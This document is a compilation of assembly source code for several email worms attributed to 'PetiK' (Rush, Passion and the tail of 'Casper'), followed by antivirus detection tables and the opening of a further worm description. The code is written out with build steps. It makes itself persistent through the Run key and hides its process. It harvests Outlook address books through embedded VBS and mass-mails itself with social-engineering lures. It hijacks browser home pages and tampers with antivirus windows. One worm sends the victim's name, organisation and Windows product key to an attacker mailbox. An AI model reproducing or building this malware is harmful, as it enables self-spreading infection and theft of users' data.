octets dd ?
; ===== Spread_Worm =====
m_addr db 128 dup (?)
casper_mail db 50 dup (0)
mail_name db "Casper_Tool.exe",00h
MAPIHdl dd 0
Tmp dd 0

subject db "Casper Tool Protect 1.00",00h


body db "Hi,",0dh,0ah
db "Look at this attachment...",0dh,0ah
db "This freeware alert you if you infected by "
db "I-Worm.Happy and I-Worm.Icecubes.",0dh,0ah
db "These worms spread with the file WSOCK32.DLL in the SYSTEM path.",0dh,0ah
db "The tool Casper v.1.00 scans this specific file and displays a message "
db "if it infected.",0dh,0ah,0dh,0ah,0dh,0ah
db 09h,09h,09h,"Good Bye and have a nice day",00h

Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach

MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?

MsgTo dd ?
dd 1
dd offset m_addr
dd offset m_addr
dd ?
dd ?

Attach dd ?
dd ?
dd ?
dd offset original
dd offset mail_name
dd ?
vbsd:
db 'On Error Resume Next',0dh,0ah
db 'Set Casper = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = Casper.GetNameSpace("MAPI")',0dh,0ah
db 'Set fs=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set c=fs.CreateTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt")',0dh,0ah
db 'c.Close',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah
db 'c.WriteLine P.Address',0dh,0ah
db 'c.Close',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah
db 'c.WriteLine "#"',0dh,0ah
db 'c.Close',0dh,0ah
VBSSIZE = $-vbsd

MAX_PATH equ 260

FILETIME struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends

WIN32_FIND_DATA struct
dwFileAttributes dd ?
ftCreationTime FILETIME ?
ftLastAccessTime FILETIME ?
ftLastWriteTime FILETIME ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName dd MAX_PATH (?)
cAlternateFileName db 13 dup (?)
db 3 dup (?)
WIN32_FIND_DATA ends

Search WIN32_FIND_DATA <>

end DEBUT
end
File Casper.exe received on 05.16.2009 11:21:10 (CET)

Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/Petik.worm.6144
AntiVir 7.9.0.168 2009.05.15 Worm/Casper
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.15 W32/Malware!791a
Avast 4.8.1335.0 2009.05.15 Win32:Trojan-gen {Other}
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.G
BitDefender 7.2 2009.05.16 Win32.Petik.E@mm
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 Worm.Win32.Petik.J
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 Suspicious File
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.6144!intended
F-Prot 4.4.4.56 2009.05.15 W32/Malware!791a
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/PetTick@mm
GData 19 2009.05.16 Win32.Petik.E@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Casper
Microsoft 1.4602 2009.05.16 Worm:Win32/Petik.K@mm
NOD32 4080 2009.05.15 Win32/Petik.J
Norman 6.01.05 2009.05.16 W32/Pet_Tick.6144.A
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.15 W32/Casper
PCTools 4.4.2.0 2009.05.15 I-Worm.Petik.K1
Prevx 3.0 2009.05.16 High Risk Cloaked Malware
Rising 21.29.52.00 2009.05.16 -
Sophos 4.41.0 2009.05.16 W32/Petik-I
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Petik
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.R
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Petik.K1

Additional information
File size: 6144 bytes
MD5...: 87e2b361908ac17e03ae947c75a140a2
SHA1..: f038e389ea778594125222e97d82a0a2c1404986
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Rush
Author : PetiK
Date : August 27th - September 2nd
Size : 5632 bytes (compressed with UPX tool)

Action : Copies itself to
* WINDOWS\SYSTEM\Mail32.exe
Adds in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value
* Mail Outlook = WINDOWS\SYSTEM\Mail32.exe

* On Wednesday it opens the CD-ROM
* On the 3rd it produces a sound
* On the 15th it alters "Search Page", "Start Page", and "Local Page" by
* Creates %personal%\Read_Me.txt with a text
* A VBS file searches all e-mail addresses in the Outlook software and puts them in
Mailbook.txt. The worm scans the file to find the addresses.
Subject : New Scan Virus...
Body : Hi man,
I send you the last update of ScanVir (v 2.5).
Look at the file attached.

Bye and have a nice day.

Attached : ScanVir_25.exe
* Scans window titles :
- Norton AntiVirus => Norton Virus : W32.Norton.Worm@mm
- System Properties => Minimize the window

To build the worm:
@echo off
tasm32 /ml /m9 Rush
tlink32 -Tpe -c -x -aa Rush,,,import32,dllz
upx -9 Rush.exe
if exist *.obj del *.obj
if exist *.map del *.map

To delete the worm:
del %windir%\system\Mail32.exe
del %personal%\Read_Me.txt
del %windir%\MailBook.txt

.586p
.model flat
.code

JUMPS

callx macro a
extrn a:proc
call a
endm

include useful.inc
include myinclude.inc

start:
;call hide_worm

twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
callx GetModuleFileNameA

mov edi,offset copy_worm


push edi
push 50
push edi
callx GetSystemDirectoryA
add edi,eax
mov eax,"iaM\"
stosd
mov eax,".23l"
stosd
mov eax,"exe"
stosd
pop edi

push 0
push edi
push esi
callx CopyFileA

push 8
push edi
push 1
@pushsz "Mail Outlook"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
callx SHSetValueA

check_date:
push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDayOfWeek],03h
jne beep1
cdrom_open:
push 00h
push 00h
push 00h
@pushsz "open cdaudio"
callx mciSendStringA
push 00h
push 00h
push 00h
@pushsz "set cdaudio door open"
callx mciSendStringA

beep1: push offset SystemTime


callx GetSystemTime
cmp [SystemTime.wDay],03h
jne special_folder
mov counter,0
beep2: inc counter
push 30h
callx MessageBeep
push 1
callx Sleep
cmp counter,5000
jne beep2

special_folder:
push 00h
push 05h
push offset personal
push 00h
callx SHGetSpecialFolderPathA
@pushsz "\Read_Me.txt"
push offset personal
callx lstrcat
txt_file:
push 00h
push 01h
push 02h
push 00h
push 01h
push 40000000h
push offset personal
callx CreateFileA
mov [FileHdl],eax
push 00h
push offset octets
push TXTSIZE
push offset txtd
push [FileHdl]
callx WriteFile
push [FileHdl]
callx CloseHandle

vbs_file:
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\rushhour.vbs"
callx CreateFileA
xchg edi,eax
push 00h
push offset octets
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
push 1
@pushsz "wscript C:\rushhour.vbs"
callx WinExec
push 2000
callx Sleep
@pushsz "C:\rushhour.vbs"
callx DeleteFileA

push offset SystemTime


callx GetSystemTime
cmp [SystemTime.wDay],0Fh
jne start_scan

call internet_page
start_scan:
mov edi,offset mailbook
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,"iaM\"
stosd
mov eax,"ooBl"
stosd
mov eax,"xt.k"
stosd
mov ax,"t"
stosd
xor eax,eax
stosd
open_scan_file:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset mailbook
callx CreateFileA
inc eax
je not_exist
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp

xor eax,eax
push eax
push eax
push eax
push 4
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi

push 0
push ebx
callx GetFileSize
cmp eax,3
jbe F3

scan_file:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,"@"
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_file
call send_mail
jmp scan_file
entr2: xor al,al
stosb
pop edi
jmp scan_file
f_mail:

F3: push esi


callx UnmapViewOfFile
F2: push ebp
callx CloseHandle
F1: push ebx
callx CloseHandle
not_exist:
popad

scan_window:mov counter,0
win1: inc counter
cmp counter,1000000
je end_w
@pushsz "Norton AntiVirus"
push 00h
callx FindWindowA
test eax,eax
jz win2
jmp change_nav
win2: @pushsz "System Properties"
push 00h
callx FindWindowA
test eax,eax
jz win3
jmp show_window
win3: @pushsz "Microsoft Home Page - Microsoft Internet Explorer"
push 00h
callx FindWindowA
test eax,eax
jz win1
jmp display_message
change_nav:
mov edi,eax
@pushsz "Norton Virus : W32.Norton.Worm@mm"
push edi
callx SetWindowTextA
jmp win1
show_window:
mov edi,eax
push 2
push edi
callx ShowWindow
jmp win1
display_message:
mov edi,eax
push 10h
@pushsz "Microsoft Internet Explorer"
@pushsz "You don't have access to this page"
push 00h
callx MessageBoxA
push 0
push edi
callx ShowWindow
jmp win1
end_w: push 00h
callx ExitProcess

hide_worm:
pushad
@pushsz "Kernel32.dll"
callx GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess"
push ecx
callx GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
internet_page:
pushad
call diff_val
db "Search Page",0
db "Start Page",0
db "Local Page",0
diff_val:
pop esi
push 3
pop ecx
page_loop:
push ecx
push 32
@pushsz "http://www.petik.fr.fm"
push 1
push esi
@pushsz "Software\Microsoft\Internet Explorer\Main"
push 80000001h
callx SHSetValueA
@endsz
pop ecx
loop page_loop
popad
ret

send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [MAPIHdl]
callx MAPISendMail
ret

.data
; === copy_worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)

; === beep ===


counter dd ?

; === special_folder ===


personal db 70 dup (0)
octets dd ?
FileHdl dd ?

; === scan email ===


mailbook db 50 dup (0)
mail_addr db 128 dup (?)
MAPIHdl dd 0
name_mail db "ScanVir_25.exe",0

subject db "New Scan Virus...",0


body db "Hi man,",0dh,0ah
db "I send you the last update of ScanVir (v 2.5).",0dh,0ah
db "Look at the file attached.",0dh,0ah,0dh,0ah
db 09h,09h,09h,09h,"Bye and have a nice day.",0
namefrom db "Your Best Friend",0

Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach

MsgFrom dd ?
dd namefrom
dd ?
dd ?
dd ?

MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?

Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset name_mail
dd ?

txtd: db "Hi man,",0dh,0ah,0dh,0ah


db "I don't want to destroy your computer.",0dh,0ah
db "But other programs are more dangerous.",0dh,0ah,0dh,0ah,0dh,0ah
db 09h,09h,09h,"PetiK",00h
TXTSIZE equ $-txtd

vbsd: db 'On Error Resume Next',0dh,0ah


db 'Set rush=CreateObject("Outlook.Application")',0dh,0ah
db 'Set chan=rush.GetNameSpace("MAPI")',0dh,0ah
db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set txt=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt")',0dh,0ah
db 'txt.Close',0dh,0ah
db 'For Each M In chan.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O=1 To M.AddressEntries.Count',0dh,0ah
db 'Set P=M.AddressEntries(O)',0dh,0ah
db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah
db 'txt.WriteLine P.Address',0dh,0ah
db 'txt.Close',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah
db 'txt.WriteLine "#"',0dh,0ah
db 'txt.Close',0dh,0ah
VBSSIZE equ $-vbsd

signature db "I-Worm.Rush",00h
origine db "A worm made in France",00h
author db "Written by PetiK - 2001",00h
end start
end
File Rush.exe received on 05.16.2009 19:29:11 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/Petik.worm
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.H1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Malware!92e7
Avast 4.8.1335.0 2009.05.15 Win32:Petik-Rush
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.L
BitDefender 7.2 2009.05.16 Generic.Malware.SMsp!g.42345E6D
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Petik
ClamAV 0.94.1 2009.05.16 Worm.Petik
Comodo 1157 2009.05.08 Worm.Win32.Petik.Q
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 Suspicious File
eTrust-Vet 31.6.6508 2009.05.16 Win32/Himan
F-Prot 4.4.4.56 2009.05.16 W32/Malware!92e7
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/PetTick@mm
GData 19 2009.05.16 Generic.Malware.SMsp!g.42345E6D
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 Artemis!7B523F10E098
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.H1
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick.H@mm
NOD32 4080 2009.05.15 Win32/Petik.Q
Norman 6.01.05 2009.05.16 W32/Pet_Tick.5632.B
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.5632.B
Panda 10.0.0.14 2009.05.16 W32/Petik
PCTools 4.4.2.0 2009.05.16 I-Worm.Rush.A
Prevx 3.0 2009.05.16 High Risk Cloaked Malware
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.m
Sophos 4.41.0 2009.05.16 W32/Petik-H
Sunbelt 3.2.1858.2 2009.05.16 Worm.Petik
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.Q
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.Petik
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Rush.A

Additional information
File size: 5632 bytes
MD5...: 7b523f10e09815dd401a4db17a9813c5
SHA1..: b7f647c90aeb06ee2ce145c152d09bf67966559f
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Passion
Author : PetiK
Date : September 3rd - September 8th
Size : 5120 bytes (compiled with the UPX tool)

Action : Copy itself to

* WINDOWS\SYSTEM\MsVbdll32.exe
Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value
* MsVbdll = WINDOWS\SYSTEM\MsVbdll32.exe

Depending on the system counter, it redirects the URL to :

http://www.scody.net/ggdag/fra/testi/la_passion_orig.htm

If the key HKCU\Software\[Check Passion] doesn't exist, it sends some information about the
victim by mail to passion@multimania.com.

It creates %windir%\AllMail.txt with all the addresses it finds in the Outlook
Address Book and sends a new mail :

Subject : Take a look at this...
Body : It's very important. Mail me if you have some problems.
Attachment : Important.exe

It also sends a mail with some information to passionworm@multimania.com (passionpetik).

To build the worm:


@echo off
tasm32 /ml /m9 Passion
tlink32 -Tpe -c -x -aa Passion,,,import32,dllz
upx -9 Passion.exe
if exist *.obj del *.obj
if exist *.map del *.map

To delete the worm:


del %windir%\system\MsVbdll32.exe <= copy of the worm
del %windir%\AllMail.txt <= mails are saved here
#

.586p
.model flat
.code

JUMPS

callx macro a
extrn a:proc
call a
endm

include useful.inc
include myinclude.inc

start: call hide_worm

twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
callx GetModuleFileNameA

mov edi,offset copy_worm


push edi
push 50
push edi
callx GetSystemDirectoryA
add edi,eax
mov eax,"VsM\"
stosd
mov eax,"lldb"
stosd
mov eax,"e.23"
stosd
mov eax,"ex"
stosd
pop edi
push 0
push edi
push esi
callx CopyFileA

reg_save:
push 8
push edi
push 1
@pushsz "MsVbdll"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
callx SHSetValueA

check_connect:
push 0
push offset connected
callx InternetGetConnectedState
dec eax
jnz exec_other
system_counter:
callx GetTickCount
xor edx,edx
mov ecx,10
div ecx
cmp edx,2
jne check_connect
call change_page
chec_reg:
push offset regDisp
push offset regResu
push 0
push 0F003Fh
push 0
push 0
push 0
@pushsz "Software\[Check Passion]"
push 80000001h
callx RegCreateKeyExA
push [regResu]
callx RegCloseKey
cmp [regDisp],1
jne vbs_file

search_info:
push 50
push offset passion_txt
callx GetWindowsDirectoryA
@pushsz "\Passion.txt"
push offset passion_txt
callx lstrcat
call CreateDate
call CreateTime
push offset passion_txt
push offset date
@pushsz "Date"
@pushsz "Date et Heure"
callx WritePrivateProfileStringA
push offset passion_txt
push offset time
@pushsz "Heure"
@pushsz "Date et Heure"
callx WritePrivateProfileStringA

mov esi,offset name_user


call name_size
dd 30
name_size:
push esi
call reg
dd 1
reg:
@pushsz "RegisteredOwner"
@pushsz "Software\Microsoft\Windows\CurrentVersion"
push 80000002h
callx SHGetValueA
push offset passion_txt
push offset name_user
@pushsz "Nom d'enregistrement"
@pushsz "Information systême"
callx WritePrivateProfileStringA

mov esi,offset name_company


call company_size
dd 30
company_size:
push esi
call reg2
dd 1
reg2:
@pushsz "RegisteredOrganization"
@pushsz "Software\Microsoft\Windows\CurrentVersion"
push 80000002h
callx SHGetValueA
push offset passion_txt
push offset name_company
@pushsz "Nom de l'entreprise"
@pushsz "Information systême"
callx WritePrivateProfileStringA

mov esi,offset number_key


call key_size
dd 30
key_size:
push esi
call reg3
dd 1
reg3:
@pushsz "ProductKey"
@pushsz "Software\Microsoft\Windows\CurrentVersion"
push 80000002h
callx SHGetValueA
push offset passion_txt
push offset number_key
@pushsz "Numéro de la clé Windows"
@pushsz "Information systême"
callx WritePrivateProfileStringA

push 50
push offset Systemini
callx GetWindowsDirectoryA
@pushsz "\Win.ini"
push offset Systemini
callx lstrcat
push offset Systemini
push 20
push offset org_pays
push offset default
@pushsz "sCountry"
@pushsz "intl"
callx GetPrivateProfileStringA
push offset passion_txt
push offset org_pays
@pushsz "Pays"
@pushsz "Information systême"
callx WritePrivateProfileStringA

xor eax,eax
push eax
push eax
push offset Message2
push eax
push [hMapi]
callx MAPISendMail

vbs_file:
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\passion.vbs"
callx CreateFileA
xchg edi,eax
push 0
push offset octets
push vbssize
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
popad

push 1
@pushsz "wscript C:\passion.vbs"
callx WinExec
push 1000
callx Sleep
@pushsz "C:\passion.vbs"
callx DeleteFileA
start_scan:
mov edi,offset allmail
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,"llA\"
stosd
mov eax,"liaM"
stosd
mov eax,"txt."
stosd
xor eax,eax
stosd

open_scan_mail:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset allmail
callx CreateFileA
inc eax
je end_spread
dec eax
xchg eax,ebx

xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp

xor eax,eax
push eax
push eax
push eax
push 4
push ebp
callx MapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
callx GetFileSize
cmp eax,3
jbe end_s3

scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
entr2: xor al,al
stosb
pop edi
jmp scan_mail
f_mail:

end_s3: push esi


callx UnmapViewOfFile
end_s2: push ebp
callx CloseHandle
end_s1: push ebx
callx CloseHandle
end_spread:
popad
jmp end_w

exec_other:
push 10000
callx Sleep
push 0
push offset copy_worm
callx WinExec
end_w: push 00h
callx ExitProcess

hide_worm:
pushad
@pushsz "Kernel32.dll"
callx GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess"
push ecx
callx GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret

change_page:
pushad
call @value
db "Default_Page_URL",0
db "Search Page",0
db "Start Page",0
db "Local Page",0
@value: pop esi
push 4
pop ecx
p_loop:
push ecx
push 32
@pushsz "http://www.scody.net/ggdag/fra/testi/la_passion_orig.htm"
push 1
push esi
@pushsz "Software\Microsoft\Internet Explorer\Main"
push 80000001h
callx SHSetValueA
@endsz
pop ecx
loop p_loop
popad
ret
CreateDate Proc
pushad
mov edi,offset date
push 32
push edi
@pushsz "ddd, dd MMM yyyy"
push 0
push 0
push 9
callx GetDateFormatA
popad
ret
CreateDate EndP
CreateTime Proc
pushad
mov edi,offset time
push 32
push edi
@pushsz "HH:mm:ss"
push 0
push 0
push 9
callx GetTimeFormatA
popad
ret
CreateTime EndP

send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [hMapi]
callx MAPISendMail
ret

.data
; === copy_worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)
date db 17 dup (?)
time db 9 dup (?)

; === search_info ===


name_user dd 0
name_company dd 0
number_key dd 0
default db 0
Systemini db 50 dup (0)
org_pays db 20 dup(0)
passion_txt db 50 dup (0)
regDisp dd 0
regResu dd 0
; === spread ===
connected dd 0
octets dd ?
allmail db 50 dup (0)
mail_addr db 128 dup (?)
hMapi dd 0

subject db "Take a look at this...",0


body db "It's very important. Mail me if you have some problems.",0
name_mail db "Important.exe",0
subject2 db "Worm.Passion",0
body2 db "Another person",0
mail_me db "passionworm@multimania.com",0

Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach

Message2 dd ?
dd offset subject2
dd offset body2
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo2
dd 1
dd offset Attach2

MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?

MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?

MsgTo2 dd ?
dd 1
dd ?
dd offset mail_me
dd ?
dd ?

Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset name_mail
dd ?
Attach2 dd ?
dd ?
dd ?
dd offset passion_txt
dd ?
dd ?
vbsd: db 'On Error Resume Next',0dh,0ah
db 'Set rush=CreateObject("Outlook.Application")',0dh,0ah
db 'Set chan=rush.GetNameSpace("MAPI")',0dh,0ah
db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set txt=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\AllMail.txt")',0dh,0ah
db 'txt.Close',0dh,0ah
db 'For Each M In chan.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O=1 To M.AddressEntries.Count',0dh,0ah
db 'Set P=M.AddressEntries(O)',0dh,0ah
db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\AllMail.txt",8,true)',0dh,0ah
db 'txt.WriteLine P.Address',0dh,0ah
db 'txt.Close',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\AllMail.txt",8,true)',0dh,0ah
db 'txt.WriteLine "#"',0dh,0ah
db 'txt.Close',0dh,0ah
vbssize equ $-vbsd

signature db "I-Worm.Passion",00h
author db "Coded by PetiK - 2001",00h

end start
end
File Passion.exe received on 05.16.2009 19:28:44 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/Petik.worm.5120
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.AV.07
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Malware!cacd
Avast 4.8.1335.0 2009.05.15 Win95:Passion
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.Malware.SMksp!g.37F2CD76
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Petik
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Worm.Win32.Petik.V
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 Suspicious File
eTrust-Vet 31.6.6508 2009.05.16 -
F-Prot 4.4.4.56 2009.05.16 W32/Malware!cacd
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Petik!worm
GData 19 2009.05.16 Generic.Malware.SMksp!g.37F2CD76
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 Artemis!0A4E37025FEC
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.AV.07
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick.O@mm
NOD32 4080 2009.05.15 Win32/Petik.V
Norman 6.01.05 2009.05.16 W32/Petik.R
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 W32/Petik.C
PCTools 4.4.2.0 2009.05.16 I-Worm.Passion.A
Prevx 3.0 2009.05.16 High Risk Cloaked Malware
Rising 21.29.52.00 2009.05.16 Worm.Mail.Win32.Petik
Sophos 4.41.0 2009.05.16 W32/Petik-M
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Petik
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.O
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Passion.A

Additional information
File size: 5120 bytes
MD5...: 0a4e37025fec58713036fa88a28a070e
SHA1..: d85aa3be13c031e015b7378c7cb1951fb7ba2efa
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.WTC (aka I-Worm.Super, which was the worm's first name)
Author : PetiK
Date : September 11th (A great day that we don't forget all around the world) - October 11th
Size : 8704 bytes (compiled with the UPX tool)

Action: Copy itself to

* WINDOWS\SYSTEM\Visual8.exe
Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value
* Visual Debugger = WINDOWS\SYSTEM\Visual8.exe

It infects all RAR files in the Personal directory.

It creates C:\wrm.vbs. This file searches for all e-mail addresses in the WAB and stores them in
the file C:\email.mel. It waits 2 sec. and deletes the VBS file.

When the current day is the 11th it displays a messagebox.

Note of the author.
-------------------
